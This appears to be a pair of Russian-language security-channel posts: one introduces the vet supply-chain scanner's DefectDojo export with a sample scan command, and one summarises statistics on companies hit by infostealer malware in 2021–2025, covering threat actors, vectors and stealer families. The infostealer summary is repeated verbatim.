safedep Docs: DefectDojo Integration
OpenSSF Scorecard
Github: OSSF Scorecard
Как использовать:
1. Добавляем\используем нужный product-id
2. Запускаем vet
3. Наслаждаемся репортами
Пример запуска:
vet scan --github https://github.com/safedep/demo-client-python \
--filter-suite /path/to/your/policy-suite.yml \
--report-defect-dojo \
--defect-dojo-host-url http://localhost:8080/ \
--defect-dojo-product-id <your-product-id>
Есть небольшое демо работы.
Что за vet такой?
vet - это инструмент для защиты от атак на цепочки поставок ПО с открытым исходным кодом. Информация о уязвимостях из берётся из OSV, а для описания политик используется Common Expressions Language.
Функционал и особенности:
- Статус сопровождения пакета
- Соответствие расширенным атрибутам лицензии
- Управление рисками OSS на основе OpenSSF Scorecard
- Анализ прямых и транзитивных зависимостей
—
Github: vet
safedep Docs: DefectDojo Integration
OpenSSF Scorecard
Github: OSSF Scorecard
SafeDep - Real-time Open Source Software Supply Chain Security
Announcing DefectDojo Integration
Introducing DefectDojo Integration allowing vet users to export scan results to DefectDojo. Continue leveraging DefectDojo for your vulnerability management while using vet for identifying vulnerable and malicious open source packages.
InfoStealers
Infostealer Victims
Organizations affected by infostealer malware attacks. View breach details, dates, impacted data, and direct sources for each incident
У Infostealers появился список компаний-жертв инфостилеров. Свой отчёт список начинает с 2021, вряд ли список исчерпывающий и данные не изобилуют техническими деталями, но определенные выводы мы сделать можем.
Тут должна была быть красивая и стильная инфографика, но я не умею её делать.
За период 2021-2025 упомянуто 36 случаев утечек из-за заражения стилерами.
Статистика по годам:
- 2021 - 1
- 2022 - 2
- 2023 - 3
- 2024 - 19
- 2025 - 14
Дальше уже будет меньше точных цифр, так как данные не полные.
Топ по Threat Actor:
- UNC5537 (их связывают со взломом Snowflake)
- HELLCAT (действующие лица: Rey, Miyako, Pryx)
- Tamagami (постер на BreachForums)
- GHNA (постер на BreachForums, возможно связан с Spectos)
- Satanic (постер на BreachForums)
- Diddy Squad (по данным vx-undeground)
Статистика по векторам:
- Snowflake - 9
- Law enforcement portal - 4
Остальное это прочий third-party, так же заражение BYOD и просто обычный фишинг (но их суммарно больше).
Топ по стилерам:
- Lumma
- Redline
- Racoon
С публикацией утечек всё довольно просто: основная масса публикуется на BreachForums, бывает что-то и в Telegram, но это чаще от одиночек (а ещё это часто удаляется самим Telegram).
Данные не полные, требуют обогащения, но в целом можно сделать выводы, что рынок инфостилеров поделён между крупными группами хакеров, хоть и есть место небольшим группам или одиночкам. А сами стилеры распространяются как фишинговыми атаками, так и через взлом third-party компаний и сервисов.
За период 2021-2025 упомянуто 36 случаев утечек из-за заражения стилерами.
Статистика по годам:
- 2021 - 1
- 2022 - 2
- 2023 - 3
- 2024 - 19
- 2025 - 14
Дальше уже будет меньше точных цифр, так как данные не полные.
Топ по Threat Actor:
- UNC5537 (их связывают со взломом Snowflake)
- HELLCAT (действующие лица: Rey, Miyako, Pryx)
- Tamagami (постер на BreachForums)
- GHNA (постер на BreachForums, возможно связан с Spectos)
- Satanic (постер на BreachForums)
- Diddy Squad (по данным vx-undeground)
Статистика по векторам:
- Snowflake - 9
- Law enforcement portal - 4
Остальное это прочий third-party, так же заражение BYOD и просто обычный фишинг (но их суммарно больше).
Топ по стилерам:
- Lumma
- Redline
- Racoon
С публикацией утечек всё довольно просто: основная масса публикуется на BreachForums, бывает что-то и в Telegram, но это чаще от одиночек (а ещё это часто удаляется самим Telegram).
Данные не полные, требуют обогащения, но в целом можно сделать выводы, что рынок инфостилеров поделён между крупными группами хакеров, хоть и есть место небольшим группам или одиночкам. А сами стилеры распространяются как фишинговыми атаками, так и через взлом third-party компаний и сервисов.